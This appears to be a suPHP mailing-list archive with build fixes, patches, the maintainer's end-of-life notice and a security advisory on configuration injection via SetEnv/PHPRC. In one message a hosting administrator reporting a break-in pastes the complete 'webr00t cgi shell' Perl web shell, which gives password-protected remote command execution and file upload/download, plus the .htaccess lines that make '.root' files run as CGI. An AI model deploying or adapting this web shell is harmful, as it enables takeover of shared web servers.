Michael Winterberg | 16 Feb 16:52 2014
Picon

Re: How to get more details ?

Hello,

i have the same problem now.
suPHP and mediawiki.
but the link to the solution is broken now.
do you remember how did you soled the problem?

thanks a lot for help

-----------------------------------------------------------------------------------------------------
Michael Winterberg (CTO)
find my profile <at>  michael.tischefrei.de
tischefrei.de GmbH | Franz-Schubert-Str. 3 | 36043 Fulda
Sitz der Gesellschaft: Fulda | Handelsregister: Amtsgericht Fulda HRB 6123
Geschäftsführer: Bernhard Fichtenbauer, Tobias Walter, Michael Winterberg
-----------------------------------------------------------------------------------------------------
facebook | twitter | google+ | youtube

_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Lance | 27 Oct 23:57 2013
Picon

Help adding 2 new options

I hope someone can help me with this. I've been trying to add two new options to mod_suphp, basically suPHP_NProc and suPHP_NProc_Error I'm just not good enough with C to get it all working correctly.

I was wanting suPHP_NProc to set the maximum number of permitted PHP processes. (I know Apache has RLimitNProc, but I was just looking to add something that is suPHP specific.)

The other option suPHP_NProc_Error I was wanting to add to let you override the error code that is returned when the process limit is reached instead of returning a generic 500 error code (Internal Server Error).

Any help with this would be appreciated.
_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
suphp | 13 Oct 13:21 2013

htaccess override suphp_ConfigPath

Howdy :-)

On debian 7 I've some virtual host (each virtual host as a php.ini does
not visible on ftp root).

i.e.

DocumentRoot /home/domain1/domain1/
suPHP_ConfigPath /home/domain1/

I need use htaccess and I modify AllowOverride from none to FileInfo:

AllowOverride FileInfo

Works :-)

But if I put (in htaccess) this line:

suPHP_ConfigPath /home/domain1/domain1/

I can write a NEW php.ini and override ALL security options!

What I should do?

Thanks

Pol
Sebastiaan Hoogeveen | 9 Oct 10:16 2013
Picon

Patch for logging of exceptions

Hi,

If SuPHP cannot run a script (e.g. because an Apache process limit has been reached) currently no error is
logged. The following very small patch makes exception information appear in the SuPHP log to help find
these (and possibly other) configuration issues:

---
diff -u -r suphp-0.7.2/src/Application.cpp suphp-0.7.2-patched/src/Application.cpp
--- suphp-0.7.2/src/Application.cpp     2013-05-20 13:24:54.000000000 +0200
+++ suphp-0.7.2-patched/src/Application.cpp     2013-10-09 09:14:55.000000000 +0200
 <at>  <at>  -136,6 +136,7  <at>  <at> 
         // So, if we get here, return with error code
         return 1;
     } catch (SoftException& e) {
+        logger.logError(e.toString());
         if (!config.getErrorsToBrowser()) {
             std::cerr << e;
             return 2;
---

I understand that SuPHP is no longer actively maintained, but it is still an immensely useful piece of
software to us. Not just because it seperates user scripts but also because it enables us to offer our
customers the option to choose the PHP version their websites run on.

Kind regards,

--

-- 
Sebastiaan Hoogeveen
<s.hoogeveen@...>

NederHost is ingeschreven bij de Kamer van Koophandel onder dossier 34099781.
AskApache | 6 Jun 04:15 2013

Compile/Build issue with new 0.7.2 version

Previously I could do this:

# cd /opt/DIST/ && curl -O
http://www.suphp.org/download/suphp-0.7.1.tar.gz && tar -xzf
suphp-0.7.1.tar.gz && cd suphp-0.7.1
# ./configure && make && sudo make install

But with 7.2:

# ./configure
configure: error: cannot find install-sh, install.sh, or shtool in
config "."/config

So I tried to autoreconf and was able to configure, but then make:

# make
Making all in src
make[1]: Entering directory `/opt/SOURCE/suphp-0.7.2/src'
make  all-recursive
make[2]: Entering directory `/opt/SOURCE/suphp-0.7.2/src'
Making all in apache2
make[3]: Entering directory `/opt/SOURCE/suphp-0.7.2/src/apache2'
/bin/sh ../../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I.
-I../../src  -DLINUX=2 -D_REENTRANT -D_GNU_SOURCE  -I/usr/include/httpd
-I/usr/include/apr-1 -pthread
-DSUPHP_PATH_TO_SUPHP=\"/usr/local/sbin/suphp\" -DSUPHP_USE_USERGROUP -g
-O2 -MT mod_suphp.lo -MD -MP -MF .deps/mod_suphp.Tpo -c -o mod_suphp.lo
mod_suphp.c
libtool: Version mismatch error.  This is libtool 2.4.2
Debian-2.4.2-1ubuntu1, but the
libtool: definition of this LT_INIT comes from libtool 2.2.6b.
libtool: You should recreate aclocal.m4 with macros from libtool 2.4.2
Debian-2.4.2-1ubuntu1
libtool: and run autoconf again.

I was able to get it to work by doing:

# aclocal && libtoolize --force && automake --add-missing && autoreconf

So now I do:

# cd /opt/DIST/ && curl -O
http://www.suphp.org/download/suphp-0.7.2.tar.gz && tar -xzf
suphp-0.7.2.tar.gz && cd suphp-0.7.2
# aclocal && libtoolize --force && automake --add-missing && autoreconf
&& ./configure && make && sudo make install

Which works perfectly.  You may want to regenerate the build though.. 
BTW thank you for this amazingly useful piece of software, you should
add a donation link to your site.

# webmaster askapache com 0x6DC3AB5F
Sebastian Marsching | 22 May 14:29 2013

suPHP End of Life Notice

Dear suPHP community,

suPHP has been around for more than ten years now.

As some of you have noticed, the development activity has declined with 
time, in particular over the last four years.

I started the suPHP project when I was sharing a server with some 
friends and thus we wanted each user to have her individual space. As 
over time servers became cheaper and cheaper, each person started to use 
a server of her own. For about the last six years, I have only been 
using suPHP because my server had been setup this way and there was no 
immediate reason to change.

Thus, I have not been personally interested in further developing suPHP 
for quite some time. In addition to that I hardly found time to take 
care of suPHP in the last few years. I am still very interested and 
active in the idea of open-source software, however as my interests 
shifted, the projects I have been working on lately shifted as well.

If you want to get an idea about which kind of projects I am talking 
about, you might want to have a look at my personal projects at 
http://projects.marsching.org/ and my company's open-source projects at 
http://oss.aquenos.com/.

In conclusion this has left suPHP in a state where it would be 
irresponsible to suggest to users that it is being actively maintained. 
For example the latest security update has been lying around for years 
before actually being released.

Therefore, I officially announce that suPHP has reached its end of life 
and will not be maintained by me in the future.

So does this mean that suPHP is dead? This entirely depends on you, the 
community.

At some points in time during the last years, I have seen quite some 
activity on the mailing-list, including people discussing bugs and new 
features and writing patches for them.

As suPHP is open-source software, everyone is free to keep building on 
top of it. Actually I hope that someone might be interested in 
maintaining suPHP in the future.

While I will not take an active role in this process, be assured that I 
will support it (e.g. by keeping this mailing-list available as long as 
needed or making the existing code-base available under a different OSS 
license, if this helps).

I want to thank all people who helped me with the suPHP project, be it 
by reporting bugs, sharing their ideas, writing patches or answering 
questions on the mailing-list. Thanks to all of you!

- Sebastian

Attachment (smime.p7s): application/pkcs7-signature, 5762 bytes
_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Aki Tuomi | 20 May 19:37 2013
Picon

Patch to allow configure against 2.4 Apache

Hi!

Attached, a small fix for configure.ac to enable compilation on Apache 2.4. 

I have tested this myself, and am runnign apache 2.4 with suphp successfully.

Aki Tuomi
_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Sebastian Marsching | 20 May 18:39 2013

Security Update Released

Hi,

I just released suPHP 0.7.2, which fixes a security issue present in 
suPHP 0.7.0 and 0.7.1.

The bug existed in the routine handling the display of PHP source files:

When the suPHP_PHPPath was set, mod_suphp would use the specified PHP 
executable to pretty-print PHP source files (MIME type 
x-httpd-php-source or application/x-httpd-php-source).

However, it would not sanitize the environment. Thus a user that was 
allowed to use the SetEnv directive in a .htaccess file (AllowOverride 
FileInfo) could make PHP load a malicious configuration file (e.g. 
loading malicious extensions).

As the PHP process for highlighting the source file was run with the 
privileges of the user Apache HTTPd was running as, a local attacker 
could probably execute arbitrary code with the privileges of this user.

This update fixes the problem by cleaning the environment before calling 
the PHP executable for printing the source code.

I want to thank John Lightsey for reporting this bug.

You can avoid this issue without upgrading by making sure that 
suPHP_PHPPath is not set.

There is a second change in suPHP 0.7.2, which - while not having any 
direct security implications - addresses an issue, where some unwanted 
behavior might be exploited:

suPHP offers to specify a PHP configuration file by using the 
suPHP_ConfigPath directive. For using this directive in a .htaccess 
file, AllowOverride Options must be set.

On the other hand, a user could get the same result by directly setting 
the PHPRC environment variable using the SetEnv directive. This 
directive however requires AllowOverride FileInfo.

Therefore an administrator setting AllowOverride FileInfo but not 
AllowOverride Options could have been tricked into believing that a user 
could not specify a configuration file, while in fact she could.

This is fixed now, because now suPHP will ignore the PHPRC environment 
variable and only use the SUPHP_PHP_CONFIG environment variable. This 
variable however, will always be overwritten by mod_suphp, even if it 
has been set using the SetEnv directive.

-Sebastian

Attachment (smime.p7s): application/pkcs7-signature, 5762 bytes
_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Roger Abt | 25 Mar 19:47 2013
Picon

CLI - STDIN/STDOUT not defined

Hi Folks

I like to contribute some code to the Joomla-CMS Core. I wrote a little app
that searches for updates 
and mail to the website owner, if any is available. So far not bad.
Developed on localhost (xampp/windows), 
testet on a hosting server (linux/shared).

And the script does not work on the hosting-server, because in a parent's
class constructor
(JApplicationCli = designed for commandline) is a statment, to ensure, that
the call is coming from the command-line:

if(!defined('STDOUT') | ! defined(STDIN) | !isset($_SERVER['argv']))
{
	die();
}

On the hosting server, that uses suPHP, I figured out that these two
constants STDIN and STDOUT are not defined, 
and thus let the script die. 

Because the existence of that statement let me assume, that in
php-cli-environments generally these two constants 
should be defined by default. Right? 

As I am not a server geek, my questions are (and hopefully someone has a
answer):

- is this statement wrong because these constants must not necessarly are
defined by the cli-environment, and the statement
in that core-class should be changed?

- are these constants only in suPHP not defined by default?

- or is the server not properly configurated and STDIN/STDOUT should be
defined? And if, what and where should be 
changed in the configuration?

I am thankful for every toughts and hints.

Cheers
Roger
Frank Costanza | 7 Feb 00:33 2013
Picon

Hello!!

------------------------------------------------------------------------------
Free Next-Gen Firewall Hardware Offer
Buy your Sophos next-gen firewall before the end March 2013 
and get the hardware for free! Learn more.
http://p.sf.net/sfu/sophos-d2d-feb
_______________________________________________
Mod-fcgid-users mailing list
Mod-fcgid-users <at> lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-fcgid-users
r r | 22 Jan 16:09 2013
Picon

suPHP bypass Hack

Dear suPHP Users,

We are using for years suPHP on our sharehosting servers with success till today.

Also we use http://help.directadmin.com/item.php?id=247 for installation.

Code:
Safe Mode OFF Open BaseDir ON disable_functions:exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source /tmp noexec chgrp apache /usr/bin/perl /usr/bin/wget /usr/local/bin/wget /usr/local/bin/curl /usr/bin/curl /usr/bin/python chmod 705 /usr/bin/perl /usr/bin/wget /usr/local/bin/wget /usr/local/bin/curl /usr/bin/curl /usr/bin/python

There scan on old joomla installations like 1.5.x 1.6.x 1.7.x and slipstream an upload file into the folder images/stories/* and replace all the index.* files in the server.

Yes i know users need always update there joomla to the last stable version.

But my biggest concern now is how there bypass suphp? it works for years great, bud it seems the hackers found a way to bypass this security.

Back into the days with CLI modes there did always the same trick, so thats why we switch to suPHP CGI/FastCGI modes.

There use tooling named webr00t cgi shell and make a symbolic link link to /root

Is there someone with the same problem?

The script at cgiweb/web.root:


#!/usr/bin/perl -I/usr/local/bandmain
#------------------------------------------------------------------------------
# <b style="color:black;background-color:#ffff66">webr00t cgi shell</b> # server
#------------------------------------------------------------------------------

#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = "webr00t";        # Change this. You will need to enter this
                # to login.

$WinNT = 0;            # You need to change the value of this to 1 if
                # you're running this script on a Windows NT
                # machine. If you're running it on Unix, you
                # can leave the value as it is.

$NTCmdSep = "&";        # This character is used to seperate 2 commands
                # in a command line on Windows NT.

$UnixCmdSep = ";";        # This character is used to seperate 2 commands
                # in a command line on Unix.

$CommandTimeoutDuration = 10;    # Time in seconds after commands will be killed
                # Don't set this to a very large value. This is
                # useful for commands that may hang or that
                # take very long to execute, like "find /".
                # This is valid only on Unix servers. It is
                # ignored on NT Servers.

$ShowDynamicOutput = 1;        # If this is 1, then data is sent to the
                # browser as soon as it is output, otherwise
                # it is buffered and send when the command
                # completes. This is useful for commands like
                # ping, so that you can see the output as it
                # is being generated.

# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!

$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");

#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse
{
    local (*in) = <at> _ if <at> _;
    local ($i, $loc, $key, $val);
   
    $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

    if($ENV{'REQUEST_METHOD'} eq "GET")
    {
        $in = $ENV{'QUERY_STRING'};
    }
    elsif($ENV{'REQUEST_METHOD'} eq "POST")
    {
        binmode(STDIN) if $MultipartFormData & $WinNT;
        read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
    }

    # handle file upload data
    if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
    {
        $Boundary = '--'.$1; # please refer to RFC1867
        <at> list = split(/$Boundary/, $in);
        $HeaderBody = $list[1];
        $HeaderBody =~ /\r\n\r\n|\n\n/;
        $Header = $`;
        $Body = $';
         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
        $in{'filedata'} = $Body;
        $Header =~ /filename=\"(.+)\"/;
        $in{'f'} = $1;
        $in{'f'} =~ s/\"//g;
        $in{'f'} =~ s/\s//g;

        # parse trailer
        for($i=2; $list[$i]; $i++)
        {
            $list[$i] =~ s/^.+name=$//;
            $list[$i] =~ /\"(\w+)\"/;
            $key = $1;
            $val = $';
            $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} = $val;
        }
    }
    else # standard post data (url encoded, not multipart)
    {
        <at> in = split(/&/, $in);
        foreach $i (0 .. $#in)
        {
            $in[$i] =~ s/\+/ /g;
            ($key, $val) = split(/=/, $in[$i], 2);
            $key =~ s/%(..)/pack("c", hex($1))/ge;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} .= "\0" if (defined($in{$key}));
            $in{$key} .= $val;
        }
    }
}

#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
    $EncodedCurrentDir = $CurrentDir;
    $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
    print "Content-type: text/html\n\n";
    print <<END;
<html>
<head>
<title>webr00t cgi shell</title>
$HtmlMetaHeader

<meta name="keywords" content="W£ßRooT,webr00t,webr00t.info,hacker">
<meta name="description" content="W£ßRooT,webr00t,webr00t.info,hacker">
</head>
<body onLoad="document.f. <at> _.focus()" bgcolor="#FFFFFF" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#FF0000">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#FFFFFF" bordercolor="#FFFFFF" align="center" width="1%">
<b><font size="2">#</font></b></td>
<td bgcolor="#FFFFFF" width="98%"><font face="Verdana" size="2"><b>
<b style="color:black;background-color:#ffff66">webr00t cgi shell</b> Connected to $ServerName</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#FFFFFF"><font face="Verdana" size="2">

<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><font color="#FF0000">Upload File</font></a> |
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir"><font color="#FF0000">Download File</font></a> |
<a href="$ScriptLocation?a=logout"><font color="#FF0000">Disconnect</font></a> |
</font></td>
</tr>
</table>
<font size="3">
END
}

#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
    $Message = q$<pre><img border="0" src="http://img810.imageshack.us/img810/8043/webr00t12.png"></pre><br><br></font><h1>Sifre=webr00t</h1>
$;
#'
    print <<END;
<code>

Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]
<code>$Message
END
}

#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
    print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
    print <<END;
<code>

<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
</font>
<font size="3">
login: <b style="color:black;background-color:#ffff66">webr00t cgi shell</b><br>
password:</font><font color="#009900" size="3"><input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
    print "</font></body></html>";
}

#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
    <at> httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
    foreach $cookie( <at> httpcookies)
    {
        ($id, $val) = split(/=/, $cookie);
        $Cookies{$id} = $val;
    }
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
    print "<code>Connection closed by foreign host.<br><br></code>";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
    print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
    &PrintPageHeader("p");
    &PrintLogoutScreen;

    &PrintLoginScreen;
    &PrintLoginForm;
    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
    if($LoginPassword eq $Password) # password matched
    {
        print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
        &PrintPageHeader("c");
        &PrintCommandLineInputForm;
        &PrintPageFooter;
    }
    else # password didn't match
    {
        &PrintPageHeader("p");
        &PrintLoginScreen;
        if($LoginPassword ne "") # some password was entered
        {
            &PrintLoginFailedMessage;

        }
        &PrintLoginForm;
        &PrintPageFooter;
    }
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>

END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>

<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
    if(!$WinNT)
    {
        alarm(0);
        print <<END;
</xmp>

<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
END
        &PrintCommandLineInputForm;
        &PrintPageFooter;
        exit;
    }
}

#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
    if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
    {
        # we change the directory internally. The output of the
        # command is not displayed.
       
        $OldDir = $CurrentDir;
        $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
        chop($CurrentDir = `$Command`);
        &PrintPageHeader("c");
        $Prompt = $WinNT ? "$OldDir> " : "[admin\ <at> $ServerName $OldDir]\$ ";
        print "$Prompt $RunCommand";
    }
    else # some other command, display the output
    {
        &PrintPageHeader("c");
        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
        print "$Prompt $RunCommand<xmp>";
        $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
        if(!$WinNT)
        {
            $SIG{'ALRM'} = \&CommandTimeout;
            alarm($CommandTimeoutDuration);
        }
        if($ShowDynamicOutput) # show output as it is generated
        {
            $|=1;
            $Command .= " |";
            open(CommandOutput, $Command);
            while(<CommandOutput>)
            {
                $_ =~ s/(\n|\r\n)$//;
                print "$_\n";
            }
            $|=0;
        }
        else # show output after command completes
        {
            print `$Command`;
        }
        if(!$WinNT)
        {
            alarm(0);
        }
        print "</xmp>";
    }
    &PrintCommandLineInputForm;
    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
    local($FileUrl) = <at> _;
    if(-e $FileUrl) # if the file exists
    {
        # encode the file link so we can send it to the browser
        $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
        $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
        $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
        &PrintPageHeader("c");
        print <<END;
<code>

Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
END
        &PrintCommandLineInputForm;
        &PrintPageFooter;
    }
    else # file doesn't exist
    {
        &PrintPageHeader("f");
        print "Failed to download $FileUrl: $!";
        &PrintFileDownloadForm;
        &PrintPageFooter;
    }
}

#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
    local($SendFile) = <at> _;
    if(open(SENDFILE, $SendFile)) # file opened for reading
    {
        if($WinNT)
        {
            binmode(SENDFILE);
            binmode(STDOUT);
        }
        $FileSize = (stat($SendFile))[7];
        ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
        print "Content-Type: application/x-unknown\n";
        print "Content-Length: $FileSize\n";
        print "Content-Disposition: attachment; filename=$1\n\n";
        print while(<SENDFILE>);
        close(SENDFILE);
    }
    else # failed to open file
    {
        &PrintPageHeader("f");
        print "Failed to download $SendFile: $!";
        &PrintFileDownloadForm;

        &PrintPageFooter;
    }
}


#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
    # get fully qualified path of the file to be downloaded
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
        (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }

    if($Options eq "go") # we have to send the file
    {
        &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
        &PrintDownloadLinkPage($TargetFile);
    }
}

#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
    # if no file is specified, print the upload form again
    if($TransferFile eq "")
    {
        &PrintPageHeader("f");
        &PrintFileUploadForm;
        &PrintPageFooter;
        return;
    }
    &PrintPageHeader("c");

    # start the uploading process
    print "Uploading $TransferFile to $CurrentDir...<br>";

    # get the fullly qualified pathname of the file to be created
    chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
    $TransferFile =~ m!([^/^\\]*)$!;
    $TargetName .= $PathSep.$1;

    $TargetFileSize = length($in{'filedata'});
    # if the file exists and we are not supposed to overwrite it
    if(-e $TargetName && $Options ne "overwrite")
    {
        print "Failed: Destination file already exists.<br>";
    }
    else # file is not present
    {
        if(open(UPLOADFILE, ">$TargetName"))
        {
            binmode(UPLOADFILE) if $WinNT;
            print UPLOADFILE $in{'filedata'};
            close(UPLOADFILE);
            print "Transfered $TargetFileSize Bytes.<br>";
            print "File Path: $TargetName<br>";
        }
        else
        {
            print "Failed: $!<br>";
        }
    }
    print "";
    &PrintCommandLineInputForm;

    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through  which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
    # if no file is specified, print the download form again
    if($TransferFile eq "")
    {
        &PrintPageHeader("f");
        &PrintFileDownloadForm;
        &PrintPageFooter;
        return;
    }
   
    # get fully qualified path of the file to be downloaded
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
        (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }

    if($Options eq "go") # we have to send the file
    {
        &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
        &PrintDownloadLinkPage($TargetFile);
    }
}

#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};

$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
    &PerformLogin;

}
elsif($Action eq "command") # user wants to run a command
{
    &ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
    &UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
    &DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
    &PerformLogout;
}

 And there place .htaccess:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root
AddHandler cgi-script .root

I hope there is some fix.

Thanks for your feedback.

Greetings remco

_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp

Gmane